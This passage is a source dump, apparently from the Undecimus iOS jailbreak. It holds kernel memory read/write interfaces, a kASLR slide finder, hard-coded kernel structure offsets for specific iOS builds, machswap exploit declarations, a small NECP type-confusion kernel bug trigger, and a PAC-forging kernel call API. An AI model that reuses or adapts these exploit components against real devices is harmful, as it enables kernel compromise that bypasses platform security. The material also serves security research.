85 | * Read a 64-bit value from kernel memory. If the read fails, -1 is returned.
86 | */
87 | uint64_t kernel_read64(uint64_t address);
88 |
89 | /*
90 | * kernel_write8
91 | *
92 | * Description:
93 | * Write a single byte to kernel memory.
94 | */
95 | bool kernel_write8(uint64_t address, uint8_t value);
96 |
97 | /*
98 | * kernel_write16
99 | *
100 | * Description:
101 | * Write a 16-bit value to kernel memory.
102 | */
103 | bool kernel_write16(uint64_t address, uint16_t value);
104 |
105 | /*
106 | * kernel_write32
107 | *
108 | * Description:
109 | * Write a 32-bit value to kernel memory.
110 | */
111 | bool kernel_write32(uint64_t address, uint32_t value);
112 |
113 | /*
114 | * kernel_write64
115 | *
116 | * Description:
117 | * Write a 64-bit value to kernel memory.
118 | */
119 | bool kernel_write64(uint64_t address, uint64_t value);
120 |
121 | /*
122 | * kernel_ipc_port_lookup
123 | *
124 | * Description:
125 | * Get the address of the ipc_port and ipc_entry for a Mach port name.
126 | */
127 | bool kernel_ipc_port_lookup(uint64_t task, mach_port_name_t port_name,
128 | uint64_t *ipc_port, uint64_t *ipc_entry);
129 |
130 | #undef extern
131 |
132 | #endif
133 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_slide.c:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_slide.c
3 | * Brandon Azad
4 | */
5 | #define KERNEL_SLIDE_EXTERN
6 | #include "kernel_slide.h"
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #include "kernel_memory.h"
13 | #include "log.h"
14 | #include "parameters.h"
15 | #include "platform.h"
16 |
17 | uint64_t kernel_slide = -1;
18 |
/*
 * is_kernel_base
 *
 * Description:
 * 	Checks whether the data at the given address looks like the Mach-O header of the kernel
 * 	image. Returns false if the header cannot be read or if any of the header checks fails.
 */
static bool
is_kernel_base(uint64_t base) {
	// Interpret whatever is at the candidate address as a 64-bit Mach-O header.
	struct mach_header_64 header = {};
	if (!kernel_read(base, &header, sizeof(header))) {
		return false;
	}
	// The CPU subtype is deliberately not compared, since it may not exactly match the current
	// platform's CPU subtype (e.g. on iPhone10,1, header.cpusubtype is CPU_SUBTYPE_ARM64_ALL
	// while platform.cpu_subtype is CPU_SUBTYPE_ARM64_V8).
	return header.magic == MH_MAGIC_64
		&& header.cputype == platform.cpu_type
		&& header.filetype == MH_EXECUTE
		&& header.ncmds > 2;
}
45 |
// Determine the kernel slide starting from the host port: the port's ip_kobject field is read
// and handed to kernel_slide_init_with_kernel_image_address() as an address inside the kernel
// image. Returns true immediately if kernel_slide has already been set.
//
// NOTE(review): the kernel_read64() result is not checked; a failed read yields all-ones, which
// is then passed on as the kernel image address.
bool
kernel_slide_init() {
	if (kernel_slide != -1) {
		return true;
	}
	// Look up the kernel address of the host port.
	mach_port_t host_name = mach_host_self();
	assert(MACH_PORT_VALID(host_name));
	uint64_t host_port_address;
	bool found = kernel_ipc_port_lookup(current_task, host_name, &host_port_address, NULL);
	// Drop the port reference whether or not the lookup succeeded.
	mach_port_deallocate(mach_task_self(), host_name);
	if (found) {
		// Get the address of realhost.
		uint64_t realhost = kernel_read64(host_port_address + OFFSET(ipc_port, ip_kobject));
		return kernel_slide_init_with_kernel_image_address(realhost);
	}
	ERROR("could not lookup host port");
	return false;
}
65 |
// Determine the kernel slide from an address known to lie inside the kernel image. Candidate
// base addresses are spaced kernel_slide_step apart; the search starts at the highest candidate
// not above `address` and moves down until is_kernel_base() accepts one or the static kernel
// base has been passed. On success kernel_slide is set and true is returned.
//
// NOTE(review): the only validation of `address` is the assert() below, which disappears in
// builds that define NDEBUG.
bool
kernel_slide_init_with_kernel_image_address(uint64_t address) {
	if (kernel_slide != -1) {
		return true;
	}
	// Round the distance from the static base down to a whole number of slide steps.
	uint64_t candidate = STATIC_ADDRESS(kernel_base);
	assert(address > candidate);
	candidate = candidate + ((address - candidate) / kernel_slide_step) * kernel_slide_step;
	// Walk backwards one slide step at a time until the real kernel base is found.
	for (; candidate >= STATIC_ADDRESS(kernel_base); candidate -= kernel_slide_step) {
		if (is_kernel_base(candidate)) {
			kernel_slide = candidate - STATIC_ADDRESS(kernel_base);
			DEBUG_TRACE(1, "found kernel slide 0x%016llx", kernel_slide);
			return true;
		}
	}
	ERROR("could not find kernel base");
	ERROR("could not determine kernel slide");
	return false;
}
91 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_slide.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_slide.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_SLIDE_H_
6 | #define VOUCHER_SWAP__KERNEL_SLIDE_H_
7 |
8 | #include
9 | #include
10 |
11 | /*
12 | * kernel_slide
13 | *
14 | * Description:
15 | * The kASLR slide.
16 | */
17 | extern uint64_t kernel_slide;
18 |
19 | /*
20 | * kernel_slide_init
21 | *
22 | * Description:
23 | * Find the value of the kernel slide using kernel_read() and current_task.
24 | */
25 | bool kernel_slide_init(void);
26 |
27 | /*
28 | * kernel_slide_init_with_kernel_image_address
29 | *
30 | * Description:
31 | * Find the value of the kernel slide using kernel_read(), starting with an address that is
32 | * known to reside within the kernel image.
33 | */
34 | bool kernel_slide_init_with_kernel_image_address(uint64_t address);
35 |
36 | #undef extern
37 |
38 | #endif
39 |
--------------------------------------------------------------------------------
/Undecimus/source/log.c:
--------------------------------------------------------------------------------
1 | /*
2 | * log.c
3 | * Brandon Azad
4 | */
5 | #include "log.h"
6 |
7 | #include
8 | #include
9 | #include
10 | #import
11 |
// Forward a printf-style message to the installed log handler. When log_implementation is NULL,
// logging is disabled and the message is dropped without being formatted.
void
log_internal(char type, const char *format, ...) {
	if (log_implementation == NULL) {
		return;
	}
	va_list args;
	va_start(args, format);
	log_implementation(type, format, args);
	va_end(args);
}
21 |
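// The default logging implementation: formats the message and emits it through RAWLOG() with a
// one-character prefix derived from the message type ('I' -> '+', 'W' -> '!', 'E' -> '-';
// 'D' and any other type are printed unchanged).
static void
log_stderr(char type, const char *format, va_list ap) {
	char *message = NULL;
	// vasprintf() reports failure through its return value, and some C libraries leave the
	// output pointer undefined in that case, so normalise it to NULL before testing it.
	if (vasprintf(&message, format, ap) < 0) {
		message = NULL;
	}
	assert(message != NULL);
	if (message == NULL) {
		// Reached only when assert() is compiled out: drop the message instead of handing a
		// NULL pointer to a "%s" conversion.
		return;
	}
	switch (type) {
		case 'I': type = '+'; break;
		case 'W': type = '!'; break;
		case 'E': type = '-'; break;
		default: break;
	}
	RAWLOG("[%c] %s\n", type, message);
	SafeFreeNULL(message);
}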
37 |
38 | void (*log_implementation)(char type, const char *format, va_list ap) = log_stderr;
39 |
--------------------------------------------------------------------------------
/Undecimus/source/log.h:
--------------------------------------------------------------------------------
1 | /*
2 | * log.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__LOG_H_
6 | #define VOUCHER_SWAP__LOG_H_
7 |
8 | #include
9 | #include
10 |
11 | /*
12 | * log_implementation
13 | *
14 | * Description:
15 | * This is the log handler that will be executed when code wants to log a message. The default
16 | * implementation logs the message to stderr. Setting this value to NULL will disable all
17 | * logging. Specify a custom log handler to process log messages in another way.
18 | *
19 | * Parameters:
20 | * type A character representing the type of message that is being
21 | * logged.
22 | * format A printf-style format string describing the error message.
23 | * ap The variadic argument list for the format string.
24 | *
25 | * Log Type:
26 | * The type parameter is one of:
27 | * - D: Debug: Used for debugging messages. Set the DEBUG build variable to control debug
28 | * verbosity.
29 | * - I: Info: Used to convey general information about the exploit or its progress.
30 | * - W: Warning: Used to indicate that an unusual but possibly recoverable condition was
31 | * encountered.
32 | * - E: Error: Used to indicate that an unrecoverable error was encountered. The code
33 | * might continue running after an error was encountered, but it probably will
34 | * not succeed.
35 | */
36 | extern void (*log_implementation)(char type, const char *format, va_list ap);
37 |
38 | #define DEBUG_LEVEL(level) (DEBUG && level <= DEBUG)
39 |
40 | #if DEBUG
41 | #define DEBUG_TRACE(level, fmt, ...) \
42 | do { \
43 | if (DEBUG_LEVEL(level)) { \
44 | log_internal('D', fmt, ##__VA_ARGS__); \
45 | } \
46 | } while (0)
47 | #else
48 | #define DEBUG_TRACE(level, fmt, ...) do {} while (0)
49 | #endif
50 | #define INFO(fmt, ...) log_internal('I', fmt, ##__VA_ARGS__)
51 | #define WARNING(fmt, ...) log_internal('W', fmt, ##__VA_ARGS__)
52 | #define ERROR(fmt, ...) log_internal('E', fmt, ##__VA_ARGS__)
53 |
54 | // A function to call the logging implementation.
55 | void log_internal(char type, const char *format, ...) __printflike(2, 3);
56 |
57 | #endif
58 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap2_pwn.h:
--------------------------------------------------------------------------------
1 | #ifndef MACHSWAP2_PWN_H
2 | #define MACHSWAP2_PWN_H
3 |
4 | #include
5 |
6 | #include "common.h"
7 | #include "machswap_offsets.h"
8 |
9 | kern_return_t machswap2_exploit(machswap_offsets_t *offsets);
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap_offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef MACHSWAP_OFFSETS_H
2 | #define MACHSWAP_OFFSETS_H
3 |
4 | typedef struct {
5 | struct {
6 | /* strings kernel | grep 'Darwin' */
7 | const char *release;
8 |
9 | cpu_type_t cpu_type;
10 | /* CPU_SUBTYPE for supported */
11 | cpu_subtype_t cpu_subtype;
12 |
13 | /* basically will always be: 0xfffffff007004000 */
14 | uint64_t kernel_image_base;
15 | } constant;
16 |
17 | struct {
18 | /*
19 | nm kernel | grep '_proc_pid'
20 | 'ldr w0, [x0, #offset]
21 | */
22 | uint32_t proc_pid;
23 |
24 | /*
25 | nm kernel | grep '_proc_task'
26 | 'ldr x0, [x0, #offset]
27 | */
28 | uint32_t proc_task;
29 |
30 | /*
31 | nm kernel | grep '_proc_ucred'
32 | 'ldr x0, [x0, #offset]
33 | */
34 | uint32_t proc_ucred;
35 |
36 | /*
37 | nm kernel | grep '_get_task_map'
38 | 'ldr x0, [x0, #offset]
39 | */
40 | uint32_t task_vm_map;
41 |
42 | /*
43 | nm kernel | grep '_get_bsdtask_info'
44 | 'ld rx0, [x0, #offset]
45 | */
46 | uint32_t task_bsd_info;
47 |
48 | /*
49 | joker -m kernel | grep 'task_self_trap'
50 | go into 'bl' call
51 | near the start of the func, just after _lck_mtx_lock,
52 | it will load two values from a reg and compare them
53 | one is later loaded into x0, this is the one you *dont'* want
54 | you need the offset of the one which *isn't* later loaded into x0
55 | ldr xN, [xN, #offset]
56 | image: https://i.imgur.com/RlauIez.png
57 | */
58 | uint32_t task_itk_self;
59 |
60 | /*
61 | joker -m kernel | grep mach_ports_lookup
62 | about 1/3rd the way into the func it will load a value from a reg,
63 | call a function, and store the return value, 3 times in a row
64 | it will load from 3 offsets such as 0x2F0, 0x2F8, and 0x300 (notice they are all contiguous)
65 | the lowest of the three offsets is the one you want
66 | image: https://i.imgur.com/0M1mUSM.png
67 | (note the repeating pattern of 'ldr x0, [x20, #offset]', 'bl identical_func', 'str x0, [x21 #off]')
68 | */
69 | uint32_t task_itk_registered;
70 |
71 | /*
72 | joker -m kernel | grep 'task_info'
73 | about halfway down the func, just before a _task_deallocate call, it will
74 | load reg x0-x3, and then call a func
75 | within that func there is a jumptable, you need to find case 17 (TASK_DYLD_INFO)
76 | in here it will do two loads and stores, the first load is your _image_info_addr offset,
77 | the second is your _image_info_size offset (however this should be the _info_addr offset +0x8)
78 | image: https://i.imgur.com/WpG6Ub6.png
79 | */
80 | uint32_t task_all_image_info_addr;
81 | uint32_t task_all_image_info_size;
82 | } struct_offsets;
83 |
84 | struct {
85 | /*
86 | if IOSurface::create_surface fails, this offset being wrong is why
87 | you can find the offset manually, but it's usually either
88 | 0x6c8 for 11.0.x, 0xbc8 for 11.1.x-11.4.x, or 0xdd0 for 12.x
89 | */
90 | uint32_t create_outsize;
91 |
92 | /*
93 | iometa -Csov IOUserClient kernel | grep 'getExternalTrapForIndex'
94 | take the index (usually 0x5b8) and divide by 0x8
95 | */
96 | uint32_t get_external_trap_for_index;
97 | } iosurface;
98 | } machswap_offsets_t;
99 |
100 | machswap_offsets_t *get_machswap_offsets(void);
101 |
102 | #endif
103 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap_offsets.m:
--------------------------------------------------------------------------------
1 | #include
2 | #include // strcmp, strerror
3 | #include // uname
4 |
5 | #include "common.h" // LOG, kptr_t
6 | #include "machswap_offsets.h"
7 |
// NULL-terminated table of hard-coded offset sets. get_machswap_offsets() walks it in order and
// returns the first entry whose .release string is a prefix of kern.osrelease and whose
// .cpu_subtype equals hw.cpusubtype or is CPU_SUBTYPE_ARM_ALL, so entry order matters.
//
// No entry sets .constant.cpu_type; it is left zero-initialised and is not compared by
// get_machswap_offsets().
static machswap_offsets_t *machswap_offsets[] =
{
    // Release prefix "18.", CPU_SUBTYPE_ARM64E.
    &(machswap_offsets_t)
    {
        .constant =
        {
            .release = "18.",
            .cpu_subtype = CPU_SUBTYPE_ARM64E,
            .kernel_image_base = 0xfffffff007004000,
        },
        .struct_offsets =
        {
            .proc_pid = 0x60,
            .proc_task = 0x10,
            .proc_ucred = 0xf8,
            .task_vm_map = 0x20,
            .task_bsd_info = 0x368,
            .task_itk_self = 0xd8,
            .task_itk_registered = 0x2e8,
            .task_all_image_info_addr = 0x3a8,
            .task_all_image_info_size = 0x3b0,
        },
        .iosurface =
        {
            .create_outsize = 0xdd0,
            .get_external_trap_for_index = 0xb7,
        },
    },
    // Release prefix "18.", CPU_SUBTYPE_ARM64_V8. Differs from the entry above in
    // task_bsd_info and the two task_all_image_info_* offsets.
    &(machswap_offsets_t)
    {
        .constant =
        {
            .release = "18.",
            .cpu_subtype = CPU_SUBTYPE_ARM64_V8,
            .kernel_image_base = 0xfffffff007004000,
        },
        .struct_offsets =
        {
            .proc_pid = 0x60,
            .proc_task = 0x10,
            .proc_ucred = 0xf8,
            .task_vm_map = 0x20,
            .task_bsd_info = 0x358,
            .task_itk_self = 0xd8,
            .task_itk_registered = 0x2e8,
            .task_all_image_info_addr = 0x398,
            .task_all_image_info_size = 0x3a0,
        },
        .iosurface =
        {
            .create_outsize = 0xdd0,
            .get_external_trap_for_index = 0xb7,
        },
    },
    // Release prefix "17."; CPU_SUBTYPE_ARM_ALL makes this entry match any CPU subtype.
    &(machswap_offsets_t)
    {
        .constant =
        {
            .release = "17.",
            .cpu_subtype = CPU_SUBTYPE_ARM_ALL,
            .kernel_image_base = 0xfffffff007004000,
        },
        .struct_offsets =
        {
            .proc_pid = 0x10,
            .proc_task = 0x18,
            .proc_ucred = 0x100,
            .task_vm_map = 0x20,
            .task_bsd_info = 0x368,
            .task_itk_self = 0xd8,
            .task_itk_registered = 0x2f0,
            .task_all_image_info_addr = 0x3a8,
            .task_all_image_info_size = 0x3b0,
        },
        .iosurface =
        {
            .create_outsize = 0xbc8,
            .get_external_trap_for_index = 0xb7,
        },
    },
    // Terminator checked by the lookup loop.
    NULL,
};
90 |
91 | #include
92 | #include
93 | #include
94 |
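/*
 * Select the offset set that matches the running system.
 *
 * Queries hw.cputype, hw.cpusubtype and kern.osrelease, then returns the first table entry
 * whose .release string is a prefix of the OS release and whose .cpu_subtype equals the
 * reported subtype or is CPU_SUBTYPE_ARM_ALL.
 *
 * Returns NULL if any sysctl query fails or if no entry matches; in the latter case the
 * kernel version string is logged.
 */
machswap_offsets_t *get_machswap_offsets(void)
{
    size_t size;
    cpu_type_t cpu_type;
    size = sizeof(cpu_type_t);
    if (sysctlbyname("hw.cputype", &cpu_type, &size, NULL, 0) == -1) {
        LOG("hw.cputype: %s", strerror(errno));
        return NULL;
    }
    /* The CPU type is queried but not compared: no table entry sets .cpu_type. */
    (void)cpu_type;

    cpu_subtype_t cpu_subtype;
    size = sizeof(cpu_subtype_t);
    if (sysctlbyname("hw.cpusubtype", &cpu_subtype, &size, NULL, 0) == -1) {
        LOG("hw.cpusubtype: %s", strerror(errno));
        return NULL;
    }

    int ctl[2];
    ctl[0] = CTL_KERN;
    ctl[1] = KERN_OSRELEASE;

    /* First call with a NULL buffer asks for the required length. */
    if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
        LOG("kern.osrelease: %s", strerror(errno));
        return NULL;
    }

    /*
     * One extra byte keeps the array length nonzero and leaves room for an explicit
     * terminator, so the string functions below never run past the buffer.
     */
    char release[size + 1];
    if (sysctl(ctl, 2, release, &size, NULL, 0) == -1) {
        LOG("kern.osrelease: %s", strerror(errno));
        return NULL;
    }
    /* size now holds the number of bytes written, which is at most the buffer length - 1. */
    release[size] = '\0';

    for (size_t i = 0; machswap_offsets[i] != NULL; ++i)
    {
        machswap_offsets_t *entry = machswap_offsets[i];
        const char *prefix = entry->constant.release;
        if (strncmp(prefix, release, strlen(prefix)) != 0) {
            continue;
        }
        if (entry->constant.cpu_subtype == cpu_subtype ||
            entry->constant.cpu_subtype == CPU_SUBTYPE_ARM_ALL) {
            return entry;
        }
    }

    /* No match: fetch the kernel version string only to report it. */
    ctl[1] = KERN_VERSION;

    if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
        LOG("kern.version: %s", strerror(errno));
        return NULL;
    }

    char version[size + 1];
    if (sysctl(ctl, 2, version, &size, NULL, 0) == -1) {
        LOG("kern.version: %s", strerror(errno));
        return NULL;
    }
    version[size] = '\0';

    LOG("Failed to get offsets for kernel version: %s", version);
    return NULL;
}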
155 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap_pwn.h:
--------------------------------------------------------------------------------
1 | #ifndef MACHSWAP_PWN_H
2 | #define MACHSWAP_PWN_H
3 |
4 | #include
5 |
6 | #include "common.h"
7 | #include "machswap_offsets.h"
8 |
9 | kern_return_t machswap_exploit(machswap_offsets_t *offsets);
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/Undecimus/source/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // Undecimus
4 | //
5 | // Created by pwn20wnd on 8/29/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #include
10 | #import
11 | #import "AppDelegate.h"
12 |
// Application entry point: ignores SIGPIPE, then hands control to UIKit with AppDelegate as the
// application delegate class.
int main(int argc, char * argv[]) {
    // With SIGPIPE ignored, a write to a closed pipe or socket fails with an error instead of
    // terminating the process.
    signal(SIGPIPE, SIG_IGN);
    @autoreleasepool {
        NSString *delegateClassName = NSStringFromClass([AppDelegate class]);
        return UIApplicationMain(argc, argv, nil, delegateClassName);
    }
}
19 |
--------------------------------------------------------------------------------
/Undecimus/source/necp.c:
--------------------------------------------------------------------------------
1 | #include "necp.h"
2 | #include
3 | #include
4 |
5 | // https://blogs.projectmoon.pw/2018/11/30/A-Late-Kernel-Bug-Type-Confusion-in-NECP/NECPTypeConfusion.c
6 |
// Opens a NECP descriptor with SYS_necp_open and issues SYS_necp_session_action on it; the link
// above this function points to a write-up of a NECP type-confusion kernel bug.
//
// NOTE(review): the function returns 0 on every path, so the caller cannot tell whether the
// descriptor was created, and the descriptor is never closed if the second syscall returns.
int necp_die() {
    int necp_fd = syscall(SYS_necp_open, 0);
    if (necp_fd >= 0) {
        LOG("NECP client = %d", necp_fd);
        syscall(SYS_necp_session_action, necp_fd, 1, 0x1234, 0x5678);
    } else {
        LOG("Create NECP client failed!");
    }
    return 0;
}
17 |
--------------------------------------------------------------------------------
/Undecimus/source/necp.h:
--------------------------------------------------------------------------------
1 | #ifndef necp_h
2 | #define necp_h
3 |
4 | #include
5 |
6 | int necp_die(void);
7 |
8 | #endif /* necp_h */
9 |
--------------------------------------------------------------------------------
/Undecimus/source/pac.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call/pac.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL__PAC_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL__PAC_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /*
13 | * stage2_kernel_call_init
14 | *
15 | * Description:
16 | * Initialize stage 2 of kernel function calling.
17 | *
18 | * Initializes:
19 | * stage2_kernel_call_7v()
20 | * kernel_forge_pacia()
21 | * kernel_forge_pacia_with_type()
22 | * kernel_forge_pacda()
23 | */
24 | bool stage2_kernel_call_init(void);
25 |
26 | /*
27 | * stage2_kernel_call_deinit
28 | *
29 | * Description:
30 | * Deinitialize stage 2 of kernel function calling.
31 | */
32 | void stage2_kernel_call_deinit(void);
33 |
34 | /*
35 | * stage2_kernel_call_7v
36 | *
37 | * Description:
38 | * Call a kernel function using our stage 2 execute primitive.
39 | *
40 | * Restrictions:
41 | * At most 7 arguments can be passed.
42 | * The return value is truncated to 32 bits.
43 | * At stage 2, only arguments X1 - X6 are controlled.
44 | */
45 | uint32_t stage2_kernel_call_7v(uint64_t function,
46 | size_t argument_count, const uint64_t arguments[]);
47 |
48 | #endif
49 |
--------------------------------------------------------------------------------
/Undecimus/source/parameters.c:
--------------------------------------------------------------------------------
1 | /*
2 | * parameters.c
3 | * Brandon Azad
4 | */
5 | #define PARAMETERS_EXTERN
6 | #include "parameters.h"
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 |
14 | #include "log.h"
15 | #include "platform.h"
16 | #include "platform_match.h"
17 |
18 | // ---- Initialization routines -------------------------------------------------------------------
19 |
// A struct describing an initialization: a routine plus the platforms it applies to.
// run_initializations() passes devices and builds to platform_matches() and calls init() for
// every entry that matches.
struct initialization {
	// Device pattern handed to platform_matches(); "*" is used for the general system parameters.
	const char *devices;
	// Build pattern handed to platform_matches(); "*" is used for the general system parameters.
	const char *builds;
	// Routine that sets the parameters; it takes no arguments and returns nothing.
	void (*init)(void);
};
26 |
// Run every initialization in `inits` whose device and build patterns match this platform, in
// array order, and return how many entries matched. All matching entries run, not just the
// first one.
static size_t
run_initializations(struct initialization *inits, size_t count) {
	size_t matched = 0;
	for (size_t index = 0; index < count; index++) {
		struct initialization *entry = &inits[index];
		if (!platform_matches(entry->devices, entry->builds)) {
			continue;
		}
		entry->init();
		matched++;
	}
	return matched;
}
40 |
41 | // A helper macro to get the number of elements in a static array.
42 | #define ARRAY_COUNT(x) (sizeof(x) / sizeof((x)[0]))
43 |
44 | // ---- General system parameters -----------------------------------------------------------------
45 |
// Initialization for general system parameters. Registered below for every device and build
// ("*", "*"), so these values are hard-coded rather than derived from the running system.
static void
init__system_parameters() {
	// Unslid address of the kernel image base; the kernel slide is computed relative to it.
	STATIC_ADDRESS(kernel_base) = 0xFFFFFFF007004000;
	// Spacing between candidate kernel base addresses when searching for the slide.
	kernel_slide_step = 0x200000;
	// NOTE(review): the remaining parameters are not used in this part of the file; their
	// meaning is presumably as the names suggest. Confirm against their users.
	message_size_for_kmsg_zone = 76;
	kmsg_zone_size = 256;
	max_ool_ports_per_message = 16382;
	gc_step = 2 * MB;
}
56 |
57 | // A list of general system parameter initializations by platform.
58 | static struct initialization system_parameters[] = {
59 | { "*", "*", init__system_parameters },
60 | };
61 |
62 | // ---- Offset initialization ---------------------------------------------------------------------
63 |
// Initialization for iPhone11,8 16C50 (and similar devices).
//
// Sets the structure sizes and field offsets used when reading kernel data structures. Every
// value is a hard-coded constant; nothing here checks it against the running kernel, so an
// entry applied to a build with a different layout makes later reads use the wrong fields.
static void
offsets__iphone11_8__16C50() {
	// struct ipc_entry
	SIZE(ipc_entry) = 0x18;
	OFFSET(ipc_entry, ie_object) = 0;
	OFFSET(ipc_entry, ie_bits) = 8;
	OFFSET(ipc_entry, ie_request) = 16;

	// struct ipc_port
	SIZE(ipc_port) = 0xa8;
	BLOCK_SIZE(ipc_port) = 0x4000;
	OFFSET(ipc_port, ip_bits) = 0;
	OFFSET(ipc_port, ip_references) = 4;
	OFFSET(ipc_port, waitq_flags) = 24;
	OFFSET(ipc_port, imq_messages) = 64;
	OFFSET(ipc_port, imq_msgcount) = 80;
	OFFSET(ipc_port, imq_qlimit) = 82;
	OFFSET(ipc_port, ip_receiver) = 96;
	OFFSET(ipc_port, ip_kobject) = 104;
	OFFSET(ipc_port, ip_nsrequest) = 112;
	OFFSET(ipc_port, ip_requests) = 128;
	OFFSET(ipc_port, ip_mscount) = 156;
	OFFSET(ipc_port, ip_srights) = 160;

	// struct ipc_port_request
	SIZE(ipc_port_request) = 0x10;
	OFFSET(ipc_port_request, ipr_soright) = 0;

	// struct ipc_space
	OFFSET(ipc_space, is_table_size) = 0x14;
	OFFSET(ipc_space, is_table) = 0x20;

	// struct ipc_voucher
	SIZE(ipc_voucher) = 0x50;
	BLOCK_SIZE(ipc_voucher) = 0x4000;

	// struct proc
	OFFSET(proc, p_pid) = 0x60;
	OFFSET(proc, p_ucred) = 0xf8;

	// struct sysctl_oid
	SIZE(sysctl_oid) = 0x50;
	OFFSET(sysctl_oid, oid_parent) = 0x0;
	OFFSET(sysctl_oid, oid_link) = 0x8;
	OFFSET(sysctl_oid, oid_kind) = 0x14;
	OFFSET(sysctl_oid, oid_handler) = 0x30;
	OFFSET(sysctl_oid, oid_version) = 0x48;
	OFFSET(sysctl_oid, oid_refcnt) = 0x4c;

	// struct task
	OFFSET(task, lck_mtx_type) = 0xb;
	OFFSET(task, ref_count) = 0x10;
	OFFSET(task, active) = 0x14;
	OFFSET(task, map) = 0x20;
	OFFSET(task, itk_space) = 0x300;
	OFFSET(task, bsd_info) = 0x368;
}
114 |
// Initialization for iPhone10,1 16B92 (and similar devices).
//
// Registered in offsets[] for all devices ("*") on builds 16A366-16D5024a. It reuses the
// iPhone11,8 16C50 table and then changes the one value that differs here.
static void
offsets__iphone10_1__16B92() {
    // Must run first: it assigns every parameter, including task.bsd_info.
    offsets__iphone11_8__16C50();

    // Override applied after the base table so that it is not overwritten again.
    OFFSET(task, bsd_info) = 0x358;
}
122 |
// Initialization for iPhone9,3 15E302 (and similar devices).
//
// Registered in offsets[] for all devices ("*") on builds 15A5278f-15G77. Assigns the hard-coded
// structure sizes, zalloc block sizes and field offsets declared in parameters.h.
// Compared with offsets__iphone11_8__16C50(), the values that differ in this table are
// proc.p_pid, proc.p_ucred and task.itk_space.
static void
offsets__iphone9_3__15E302() {
    SIZE(ipc_entry) = 0x18;
    OFFSET(ipc_entry, ie_object) = 0;
    OFFSET(ipc_entry, ie_bits) = 8;
    OFFSET(ipc_entry, ie_request) = 16;

    SIZE(ipc_port) = 0xa8;
    BLOCK_SIZE(ipc_port) = 0x4000;
    OFFSET(ipc_port, ip_bits) = 0;
    OFFSET(ipc_port, ip_references) = 4;
    OFFSET(ipc_port, waitq_flags) = 24;
    OFFSET(ipc_port, imq_messages) = 0x40;
    OFFSET(ipc_port, imq_msgcount) = 0x50;
    OFFSET(ipc_port, imq_qlimit) = 0x52;
    OFFSET(ipc_port, ip_receiver) = 0x60;
    OFFSET(ipc_port, ip_kobject) = 0x68;
    OFFSET(ipc_port, ip_nsrequest) = 0x70;
    OFFSET(ipc_port, ip_requests) = 0x80;
    OFFSET(ipc_port, ip_mscount) = 0x9c;
    OFFSET(ipc_port, ip_srights) = 0xa0;

    SIZE(ipc_port_request) = 0x10;
    OFFSET(ipc_port_request, ipr_soright) = 0;

    OFFSET(ipc_space, is_table_size) = 0x14;
    OFFSET(ipc_space, is_table) = 0x20;

    SIZE(ipc_voucher) = 0x50;
    BLOCK_SIZE(ipc_voucher) = 0x4000;

    OFFSET(proc, p_pid) = 0x10;
    OFFSET(proc, p_ucred) = 0x100;

    SIZE(sysctl_oid) = 0x50;
    OFFSET(sysctl_oid, oid_parent) = 0x0;
    OFFSET(sysctl_oid, oid_link) = 0x8;
    OFFSET(sysctl_oid, oid_kind) = 0x14;
    OFFSET(sysctl_oid, oid_handler) = 0x30;
    OFFSET(sysctl_oid, oid_version) = 0x48;
    OFFSET(sysctl_oid, oid_refcnt) = 0x4c;

    OFFSET(task, lck_mtx_type) = 0xb;
    OFFSET(task, ref_count) = 0x10;
    OFFSET(task, active) = 0x14;
    OFFSET(task, map) = 0x20;
    OFFSET(task, itk_space) = 0x308;
    OFFSET(task, bsd_info) = 0x368;
}
173 |
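// Initialize offset parameters whose values are computed from other parameters.
//
// offsets[] registers this routine with the "*" / "*" match strings, so it also runs on a
// platform for which no per-build routine assigned the sizes. In that case the sizes are
// presumably still zero (no routine in this file has written them), and dividing by them would
// be undefined behavior before parameters_init() gets the chance to report the platform as
// unsupported. Each count is therefore left at 0 when its element size is 0.
static void
initialize_computed_offsets() {
    COUNT_PER_BLOCK(ipc_port) = (SIZE(ipc_port) != 0)
        ? BLOCK_SIZE(ipc_port) / SIZE(ipc_port)
        : 0;
    COUNT_PER_BLOCK(ipc_voucher) = (SIZE(ipc_voucher) != 0)
        ? BLOCK_SIZE(ipc_voucher) / SIZE(ipc_voucher)
        : 0;
}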
180 |
// A list of offset initializations by platform.
//
// run_initializations() walks this list in order and runs every matching entry, so the order is
// significant: the iPhone11,* and iPad8,* entries come after the generic "*" entry for the same
// build range and overwrite the values it assigned. The last entry matches everything and derives
// the per-block counts from whatever sizes the earlier entries set.
static struct initialization offsets[] = {
    { "*", "15A5278f-15G77", offsets__iphone9_3__15E302 },
    { "*", "16A366-16D5024a", offsets__iphone10_1__16B92 },
    { "iPhone11,*", "16A366-16D5024a", offsets__iphone11_8__16C50 },
    { "iPad8,*", "16A366-16D5024a", offsets__iphone11_8__16C50 },
    { "*", "*", initialize_computed_offsets },
};

// The minimum number of offsets that must match in order to declare a platform initialized.
// The "*" / "*" entry above always counts as one match, so 2 means that at least one per-build
// entry matched as well.
static const size_t min_offsets = 2;
192 |
193 | // ---- Public API --------------------------------------------------------------------------------
194 |
// Initialize the platform description, the general system parameters and the per-build offsets.
// Returns false, after logging the machine and OS build, when fewer than min_offsets entries of
// offsets[] matched this platform; returns true otherwise.
bool
parameters_init() {
